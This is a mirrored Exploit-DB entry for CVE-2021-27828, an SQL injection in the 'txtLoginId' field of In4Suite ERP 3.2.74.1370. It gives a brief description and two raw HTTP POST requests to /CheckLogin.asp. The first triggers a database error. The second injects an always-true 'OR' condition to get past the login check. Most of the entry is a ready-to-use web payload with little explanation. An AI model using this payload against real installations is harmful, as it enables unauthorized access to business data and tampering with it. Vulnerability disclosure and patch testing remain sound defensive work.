In4Suit ERP 3.2.74.1370 – ‘txtLoginId’ SQL injection - 体验盒子

作者： Gulab Mondal

日期： 2021-05-19

类别：

webapps

平台：

multiple

来源：https://www.exploit-db.com/exploits/49884/

# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection
# Date: 18/05/2021
# Exploit Author: Gulab Mondal
# Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html
# Version: In4Suite ERP 3.2.74.1370
# Tested on: Windows
# CVE: CVE-2021-27828

-----------------------------------------

SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to
modify or delete data, causing persistent changes to the application's
content or behavior by using malicious SQL queries.

--------------


# Error condition
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1

txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" "

# SQL Injection exploitation
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1

txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt="

------------------------------